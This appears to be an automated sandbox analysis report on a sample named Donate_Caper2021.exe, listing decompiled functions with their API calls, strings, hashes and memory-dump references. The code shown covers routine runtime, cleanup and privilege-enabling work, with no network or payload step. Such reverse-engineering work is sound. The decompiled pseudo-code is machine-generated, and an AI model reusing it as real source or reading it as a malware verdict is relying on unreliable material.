Instruction ID: e107e3387430d4bddb08e3b353091fbaf0128017287119b988686f732e5120fe
Opcode Fuzzy Hash: 44cb8872aa3953591152b5072696c8bfb95ab929a310b5ac001b3a4af3bd630f
Instruction Fuzzy Hash: EFF06830A0451CBBDB16AF54DC09B9DBFB9EF04715F14406AF805A21A0EF318F80CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0016EB73, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016EB73(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00170085(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0016eb74
0x0016eb7a
0x0016eb81
0x0016eb86
0x0016eb8a
0x0016eb9f
0x0016eba2
0x0016eba8
0x0016eba8
0x0016ebab
0x00000000
0x0016ebab
0x0016ebb0

APIs

Part of subcall function 00170085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001700A0
Part of subcall function 00170085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016EB86,Crypt32.dll,00000000,0016EC0A,?,?,0016EBEC,?,?,?), ref: 001700C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0016EB92
GetProcAddress.KERNEL32(001A81C0,CryptUnprotectMemory), ref: 0016EBA2

Strings

CryptUnprotectMemory, xrefs: 0016EB98
Crypt32.dll, xrefs: 0016EB7C
CryptProtectMemory, xrefs: 0016EB8C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 3237afe4118620c02efebdc6c31124954a010f1b1a4aec8187bf7c51ea78fcd0
Instruction ID: 23c96b8b996df835d45afda9fb221a37efab8661ba1a1ddedeefa641763309f6
Opcode Fuzzy Hash: 3237afe4118620c02efebdc6c31124954a010f1b1a4aec8187bf7c51ea78fcd0
Instruction Fuzzy Hash: 45E04F788407419ECF219F389C08B42BAE49B14715B04C81EF4E6D3580D7B5D5808B50

Uniqueness

Uniqueness Score: -1.00%

Function 00187DD9, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00187DD9(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x19e668; // 0xd6971696
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E001873F2( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0017E531(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0017E531(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0017E531(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0018B693(_t56);
						_t40 = E001884DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0018B693(_t56);
						E001884DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x19e668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00187dd9
0x00187de3
0x00187de7
0x00187de9
0x00187ded
0x00187df7
0x00187e08
0x00187e0d
0x00187e0f
0x00187e11
0x00187e13
0x00187e15
0x00187e19
0x00187ed3
0x00187ee1
0x00187ee3
0x00187ee8
0x00187eef
0x00187ef1
0x00187eff
0x00187f0e
0x00187f11
0x00187f13
0x00000000
0x00187f14
0x00187e21
0x00187e26
0x00187e2b
0x00187e2d
0x00187e2d
0x00187e2f
0x00187e34
0x00187e38
0x00187e38
0x00187e3b
0x00187e5a
0x00187e5a
0x00187e5c
0x00187e5f
0x00187e68
0x00187e6b
0x00187e70
0x00187e73
0x00187e78
0x00000000
0x00000000
0x00187e7a
0x00000000
0x00187e3d
0x00187e3d
0x00187e3f
0x00187e48
0x00187e4b
0x00187e50
0x00187e53
0x00187e58
0x00187e82
0x00187e85
0x00187e87
0x00187e8a
0x00187e92
0x00187e98
0x00187e9f
0x00187ea1
0x00187ea9
0x00187eb8
0x00187ebc
0x00187ebe
0x00187ec1
0x00000000
0x00000000
0x00187ec3
0x00187ec6
0x00187ec8
0x00187ec8
0x00187ec9
0x00187ecb
0x00187ece
0x00000000
0x00187ec8
0x00000000
0x00187e58
0x00187e3b
0x00000000

APIs

_free.LIBCMT ref: 00187E4B
_free.LIBCMT ref: 00187E6B

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4f4a34d282fe01303e4af48505c917821f2257661c3e61a29011f2b30d41c45a
Instruction ID: 4a0993ae7580a4c08395f500fb5fd945b0fd95c00c6cc865539e99878908b22d
Opcode Fuzzy Hash: 4f4a34d282fe01303e4af48505c917821f2257661c3e61a29011f2b30d41c45a
Instruction Fuzzy Hash: 1941B036A003049BDB24EF78C881A5EB7E5EF99714F2545A9E515EB281EB31EE01CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00189029, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00189029(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x19e6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E001885A9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E0018A671(_t13, _t17, __eflags,  *0x19e6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00188E16(_t13, _t16, 0x1c1290);
							E001884DE(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E001884DE();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E0018A61B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00189029
0x00189034
0x00189036
0x00189038
0x0018903d
0x00189040
0x0018904e
0x0018905a
0x0018905d
0x00189060
0x00189072
0x00189077
0x00189079
0x00189084
0x0018908a
0x00189092
0x00189094
0x00000000
0x00000000
0x00000000
0x00000000
0x0018907b
0x0018907b
0x00000000
0x0018907b
0x00189062
0x00189062
0x00189063
0x00189063
0x00189096
0x00189097
0x00189097
0x00189042
0x00189048
0x0018904c
0x0018909f
0x001890a0
0x001890a6
0x00000000
0x00000000
0x00000000
0x0018904c
0x001890ad

APIs

GetLastError.KERNEL32(?,001A0EE8,00000200,0018895F,001858FE,?,?,?,?,0016D25E,?,03248F10,00000063,00000004,0016CFE0,?), ref: 0018902E
_free.LIBCMT ref: 00189063
_free.LIBCMT ref: 0018908A
SetLastError.KERNEL32(00000000,00193958,00000050,001A0EE8), ref: 00189097
SetLastError.KERNEL32(00000000,00193958,00000050,001A0EE8), ref: 001890A0

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c72f90e2e684c70f2e06e8b66ce005a94083d2b0d8e3bda8c650dc3697215449
Instruction ID: c24523b0dfd370577ed3753c94ffef8aee7a5231dadfd6c453c12a810d13c155
Opcode Fuzzy Hash: c72f90e2e684c70f2e06e8b66ce005a94083d2b0d8e3bda8c650dc3697215449
Instruction Fuzzy Hash: 7101F436505B006BD3227B356C85A3B266D9FE13B173D012AF51592252EF60CF015F60

Uniqueness

Uniqueness Score: -1.00%

Function 0017075B, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0017075B(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00191FA1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00170A41(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E0017084E(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x0017075b
0x00170764
0x00170766
0x0017076b
0x0017076c
0x00170776
0x00170778
0x0017077d
0x0017077f
0x0017078f
0x0017079b
0x0017079d
0x001707a0
0x001707a2
0x001707a9
0x001707af
0x001707b0
0x001707b3
0x001707a0
0x001707c2
0x001707ce
0x001707da
0x001707e5
0x001707f0

APIs

Part of subcall function 00170A41: ResetEvent.KERNEL32(?), ref: 00170A53
Part of subcall function 00170A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00170A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0017078F
CloseHandle.KERNEL32(?,?), ref: 001707A9
DeleteCriticalSection.KERNEL32(?), ref: 001707C2
CloseHandle.KERNEL32(?), ref: 001707CE
CloseHandle.KERNEL32(?), ref: 001707DA

Part of subcall function 0017084E: WaitForSingleObject.KERNEL32(?,000000FF,00170A78,?), ref: 00170854
Part of subcall function 0017084E: GetLastError.KERNEL32(?), ref: 00170860

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 33298a94858b032635b76bb4ad1cada9ced385b0ff6f6f9d953a50532c13f84b
Instruction ID: 75083bacdd18d66fed5913af3cb980e38ad35c7395324a9c941b51154a025d56
Opcode Fuzzy Hash: 33298a94858b032635b76bb4ad1cada9ced385b0ff6f6f9d953a50532c13f84b
Instruction Fuzzy Hash: E6015272540704EBC7229B69DD85F86BBF9FB49710F04451AF16E82560CB756A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018BF10, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0018BF10(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x19ed50; // 0x19ed44
					if(_t23 != 0) {
						E001884DE(_t7);
					}
					_t2 = _t21 + 4; // 0x732524
					_t24 =  *_t2 -  *0x19ed54; // 0x1c1704
					if(_t24 != 0) {
						E001884DE(_t8);
					}
					_t3 = _t21 + 8; // 0x732540
					_t25 =  *_t3 -  *0x19ed58; // 0x1c1704
					if(_t25 != 0) {
						E001884DE(_t9);
					}
					_t4 = _t21 + 0x30; // 0x4f0049
					_t26 =  *_t4 -  *0x19ed80; // 0x19ed48
					if(_t26 != 0) {
						E001884DE(_t10);
					}
					_t5 = _t21 + 0x34; // 0x4e
					_t6 =  *_t5;
					_t27 = _t6 -  *0x19ed84; // 0x1c1708
					if(_t27 != 0) {
						return E001884DE(_t6);
					}
				}
				return _t6;
			}

0x0018bf16
0x0018bf1b
0x0018bf1f
0x0018bf25
0x0018bf28
0x0018bf2d
0x0018bf2e
0x0018bf31
0x0018bf37
0x0018bf3a
0x0018bf3f
0x0018bf40
0x0018bf43
0x0018bf49
0x0018bf4c
0x0018bf51
0x0018bf52
0x0018bf55
0x0018bf5b
0x0018bf5e
0x0018bf63
0x0018bf64
0x0018bf64
0x0018bf67
0x0018bf6d
0x00000000
0x0018bf75
0x0018bf6d
0x0018bf78

APIs

_free.LIBCMT ref: 0018BF28

Part of subcall function 001884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958), ref: 001884F4
Part of subcall function 001884DE: GetLastError.KERNEL32(00193958,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958,00193958), ref: 00188506

_free.LIBCMT ref: 0018BF3A
_free.LIBCMT ref: 0018BF4C
_free.LIBCMT ref: 0018BF5E
_free.LIBCMT ref: 0018BF70

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 63be1ae5138d4d9a87c2ae4916333ca607587fb05f467bba92ec6653dcbd4df6
Instruction ID: 82d663a8eda769eac6f220992dc904e4009b1bcd9653dace12689ccfcfadb2d9
Opcode Fuzzy Hash: 63be1ae5138d4d9a87c2ae4916333ca607587fb05f467bba92ec6653dcbd4df6
Instruction Fuzzy Hash: D7F0F933508201AB8620FFA8EEC6D1A73E9BB107107A4480AF108D7D20CF24FE808F64

Uniqueness

Uniqueness Score: -1.00%

Function 00188060, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00188060(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x19ed40; // 0x3241000
					if(_t7 != 0x19eb20) {
						E001884DE(_t7);
						 *0x19ed40 = 0x19eb20;
					}
				}
				E001884DE( *0x1c1288);
				 *0x1c1288 = 0;
				E001884DE( *0x1c128c);
				 *0x1c128c = 0;
				E001884DE( *0x1c16d8);
				 *0x1c16d8 = 0;
				E001884DE( *0x1c16dc);
				 *0x1c16dc = 0;
				return 1;
			}

0x00188069
0x0018806d
0x0018806f
0x0018807b
0x0018807e
0x00188084
0x00188084
0x0018807b
0x00188090
0x0018809d
0x001880a3
0x001880ae
0x001880b4
0x001880bf
0x001880c5
0x001880cd
0x001880d6

APIs

_free.LIBCMT ref: 0018807E

Part of subcall function 001884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958), ref: 001884F4
Part of subcall function 001884DE: GetLastError.KERNEL32(00193958,?,0018BFA7,00193958,00000000,00193958,00000000,?,0018BFCE,00193958,00000007,00193958,?,0018C3CB,00193958,00193958), ref: 00188506

_free.LIBCMT ref: 00188090
_free.LIBCMT ref: 001880A3
_free.LIBCMT ref: 001880B4
_free.LIBCMT ref: 001880C5

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d2ba1f13439c8e33e742d2b19a828f6583f3207de040af72a0b7aabb6b8c3e9
Instruction ID: 860d1a5dcc948fd512c3ee0945a243986a326817eea50303a77dd94a205343b1
Opcode Fuzzy Hash: 7d2ba1f13439c8e33e742d2b19a828f6583f3207de040af72a0b7aabb6b8c3e9
Instruction Fuzzy Hash: 41F03A7A841125EB9711BF15FD018553FA5F726B20398460AF80197F72CB318AE19FC2

Uniqueness

Uniqueness Score: -1.00%

Function 001876BD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E001876BD(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0018B290(_t52);
					GetModuleFileNameA(0, 0x1c1130, 0x104);
					_t49 =  *0x1c16e0; // 0x3223648
					 *0x1c16e8 = 0x1c1130;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x1c1130;
					}
					_v8 = 0;
					_v16 = 0;
					E001877E1(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00187956(_v8, _v16, 1);
					if(_t64 != 0) {
						E001877E1(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0018ADA3(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x1c16d4 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x1c16d8 = _t59;
									L16:
									E001884DE(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x1c16d4 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x1c16d8 = _t43;
						goto L10;
					} else {
						_t44 = E0018895A();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E001884DE(_t64);
						return _t50;
					}
				} else {
					_t45 = E0018895A();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00188839();
					return _t65;
				}
			}

0x001876bd
0x001876ca
0x001876ea
0x001876fd
0x00187703
0x00187709
0x00187711
0x00187718
0x00187718
0x0018771d
0x00187724
0x0018772b
0x0018773d
0x00187744
0x00187763
0x0018776f
0x0018778a
0x0018778d
0x00187794
0x0018779a
0x001877a1
0x001877a4
0x001877a6
0x001877aa
0x001877b4
0x001877b4
0x001877b6
0x001877bc
0x001877bf
0x001877c1
0x001877c7
0x001877c8
0x001877ce
0x00000000
0x00000000
0x00000000
0x00000000
0x001877ac
0x001877ac
0x001877ac
0x001877af
0x001877b0
0x00000000
0x001877ac
0x0018779c
0x00000000
0x0018779c
0x00187775
0x0018777a
0x0018777c
0x0018777e
0x00000000
0x00187746
0x00187746
0x0018774b
0x0018774d
0x0018774e
0x00187783
0x00187783
0x001877d1
0x001877d2
0x00000000
0x001877db
0x001876d2
0x001876d2
0x001876d9
0x001876da
0x001876dc
0x00000000
0x001876e1

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Donate_Caper2021.exe,00000104), ref: 001876FD
_free.LIBCMT ref: 001877C8
_free.LIBCMT ref: 001877D2

Strings

C:\Users\user\AppData\Roaming\Donate_Caper2021.exe, xrefs: 001876F4, 001876FB, 0018772A, 00187762

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe
API String ID: 2506810119-2011177925
Opcode ID: fccef42e5f2e1f1610caed476edaabd295445cd3a516133ccd567c69a8dac23d
Instruction ID: 2404cb639eb7cc0201189d81041ee33afe6d60854649963b57f878ba9c9ee5ee
Opcode Fuzzy Hash: fccef42e5f2e1f1610caed476edaabd295445cd3a516133ccd567c69a8dac23d
Instruction Fuzzy Hash: F3319C71A08218AFDB21FF999C85DAEBBECEB95710B644066F80497251D770CF80CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00167574, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00167574(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0017E28C(E00191F37, _t61);
				E0017E360();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00163B3D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x1a0eb2 == 0) {
						if(E00167BF5(L"SeSecurityPrivilege") != 0) {
							 *0x1a0eb1 = 1;
						}
						E00167BF5(L"SeRestorePrivilege");
						 *0x1a0eb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x1a0eb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x1c2000() == 0) {
						if(E0016B66C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00161F94(_t70, 0x52, _t54 + 0x24,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E0017F190(_t32);
							if(_t32 == 5 && E00170020() == 0) {
								E0016156B(_t61 - 0x6c, 0x18);
								E00170E37(_t61 - 0x6c);
							}
							E00166FC6(0x1a0f50, 1);
						} else {
							_t39 =  *0x1c2000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E001615A0(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x00167574
0x00167574
0x00167574
0x00167579
0x00167583
0x0016758b
0x0016758e
0x00167591
0x00167594
0x00167597
0x0016759a
0x0016759f
0x001675a0
0x001675a1
0x001675a7
0x001675af
0x001675bc
0x001675ca
0x001675cc
0x001675cc
0x001675d8
0x001675dd
0x001675dd
0x001675eb
0x001675ee
0x001675ef
0x001675f3
0x001675f3
0x001675f4
0x001675f5
0x001675f8
0x001675f9
0x001675fa
0x00167605
0x0016761d
0x00167632
0x0016763b
0x00167640
0x0016764f
0x00167657
0x00167667
0x0016766f
0x0016766f
0x00167678
0x0016761f
0x00167628
0x0016762e
0x00167630
0x00000000
0x00000000
0x00167630
0x0016761d
0x0016767e
0x00167682
0x0016768b
0x00167695

APIs

__EH_prolog.LIBCMT ref: 00167579

Part of subcall function 00163B3D: __EH_prolog.LIBCMT ref: 00163B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00167640

Part of subcall function 00167BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00167C04
Part of subcall function 00167BF5: GetLastError.KERNEL32 ref: 00167C4A
Part of subcall function 00167BF5: CloseHandle.KERNEL32(?), ref: 00167C59

Strings

SeRestorePrivilege, xrefs: 001675D3
SeSecurityPrivilege, xrefs: 001675BE

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
